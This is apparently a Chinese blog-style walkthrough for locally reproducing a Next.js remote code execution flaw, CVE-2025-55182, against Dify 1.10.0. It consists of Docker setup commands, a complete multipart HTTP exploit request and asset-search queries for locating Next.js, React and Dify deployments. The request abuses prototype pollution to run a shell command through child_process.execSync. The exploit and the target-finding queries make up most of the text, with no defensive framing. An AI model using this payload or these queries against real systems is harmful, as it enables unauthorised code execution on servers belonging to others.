Dify Next.js CVE-2025-55182 RCE漏洞本地复现详细版

git clone -b 1.10.0 https://github.com/langgenius/dify.git
//我选择在虚拟机ubuntu系统中安装dify，所以我在ubuntu中git clone该项目
//项目比较大，如果下载比较慢的话，可能需要魔法，朋友们自己解决哈

cd dify
cd docker
cp .env.example .env
docker compose up -d

POST /apps HTTP/1.1
Host: myservice.local
Next-Action: x
X-Nextjs-Request-Id: 91dmljym
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: hst51Myl5trXfvWsC9Ay6
Content-Length: 693

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

app="Next.js" && body="/_next/static/chunks/app/"

body="react.production.min.js" || body="React.createElement(" || app="React.js" || app="Dify"